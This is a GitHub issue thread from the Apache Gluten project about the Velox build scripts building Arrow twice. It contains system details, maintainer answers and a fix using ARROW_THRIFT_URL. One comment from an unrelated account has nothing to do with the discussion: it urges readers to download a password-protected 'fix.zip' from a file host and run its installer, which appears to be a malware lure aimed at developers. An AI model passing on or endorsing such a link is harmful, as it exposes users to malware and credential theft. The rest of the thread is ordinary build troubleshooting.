### ISSUE TITLE
[VL] Repeatedly built arrow

### ISSUE THREAD

**Issue by wForget** [apache/incubator-gluten#7046]
### Problem description

Arrow is already built in `builddeps-veloxbe.sh`, but `build_velox.sh` still needs to build arrow.

`build_arrow.sh` executes successfully after changing arrow dist to internal file server, but the following error occurred when running  `build_velox.sh`.

![image](https://github.com/user-attachments/assets/58ec1aa7-99fa-40d6-aea7-cad0ba26b776)

### System information

Velox System Info v0.0.2
Commit: 83857a11716d80bc68fe2373f93cb0c64e3748ed
CMake Version: 3.17.5
System: Linux-3.10.0-957.el7.x86_64
Arch: x86_64
CPU Name: Model name:            Intel Core Processor (Skylake, IBRS)
C++ Compiler: /opt/rh/devtoolset-9/root/usr/bin/c++
C++ Compiler Version: 9.3.1
C Compiler: /opt/rh/devtoolset-9/root/usr/bin/cc
C Compiler Version: 9.3.1
CMake Prefix Path: /usr/local;/usr;/;/usr;/usr/local;/usr/X11R6;/usr/pkg;/opt

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wForget** [comment]
@PHILO-HE  Is it expected behavior that `builddeps-veloxbe.sh` and `build_velox.sh` build arrow repeatedly?

**Comment by PHILO-HE** [comment]
@wForget, build_arrow.sh firstly builds and install native libs to system path, then builds Java and installs jars to local maven repo. According to your description, it is possible that arrow native libs are found by velox. Thus, velox goes to BUNDLED mode and build arrow c++ from source.

Could you confirm arrow's native libs are really installed into system path (/usr/local)?

**Comment by wForget** [comment]
My `build_arrow.sh` seems to fail to execute, and `builddeps-veloxbe.sh` is not interrupted.

**Comment by wForget** [comment]
> thrift_ep-download error

Use `export ARROW_THRIFT_URL=XXX` to specify a valid download url.

> builddeps-veloxbe.sh is not interrupted.

main branch has fixed this issue.

https://github.com/apache/incubator-gluten/blob/de51f7cb2651120567c5d2ce71fdac1665983011/dev/build_arrow.sh#L17
